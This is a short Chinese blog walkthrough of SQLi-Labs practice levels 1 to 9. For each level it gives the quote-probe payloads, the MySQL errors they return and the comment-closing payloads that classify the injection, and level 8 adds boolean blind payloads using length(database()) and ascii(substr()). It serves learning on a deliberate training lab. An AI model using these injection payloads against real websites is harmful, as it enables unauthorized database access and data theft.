sqli通关录1-20

sqli注入的第一关

sql注入判断:
payload:1’
返回结果:mysql报错:’’1’’ LIMIT 0,1’
重新构造:1’–+-
返回结果正常
判断为字符型注入型
接下来操作不用我多说了

sqli注入的第二关

sql注入判断:
payload:1’
返回结果:mysql报错:’’ LIMIT 0,1’
重新构造:1 –+-
返回结果正常
判断为数字注入型
接下来操作不要我多说了

sqli注入的第三关

sql注入判断:
payload:1’
返回结果:mysql报错: ‘’1’’) LIMIT 0,1’
重新构造:1’)–+-
返回结果正常
判断为字符型注入型,与上面的字符型注入多了个括号闭合
接下来操作不要我多说了

sqli注入的第四关

sql注入判断:
payload:1”
返回结果:mysql报错:’”1””) LIMIT 0,1’
重新构造:1”)–+-
返回结果正常
判断为字符型注入型,单引号报错和双引号报错注入都为字符型注入
接下来操作不要我多说了

sqli注入的第5关

sql注入判断:
payload:1’
返回结果:mysql报错:’’1’’ LIMIT 0,1’
重新构造:1’–+-
返回结果正常
判断为字符型注入型
接下来操作不要我多说了

sqli注入的第六关

sql注入判断:
payload:1”
返回结果:mysql报错: ‘“1”” LIMIT 0,1’
重新构造:1”–+-
返回结果正常
判断为字符型注入型
接下来操作不要我多说了

sqli注入的第七关

sql注入判断:
payload:1’
返回结果:mysql报错: ‘’1’’)) LIMIT 0,1’
重新构造:1’))–+-
返回结果正常
判断为字符型注入型
接下来操作不要我多说了

sqli注入的第八关

sql注入判断:
payload:1’
返回结果:false
重新构造:1’–+-
返回结果正常
判断为字符型盲注型
查数据库长度payload:1’ and length(database())>5–+-
跑数据库名payload:1’ and ascii(substr(database(),1,2))>0–+-
把database()替换成你想要查询的即可
接下来操作不要我多说了

sqli注入的第九关

0XAXSDD wechat
-------------本文结束感谢您的阅读-------------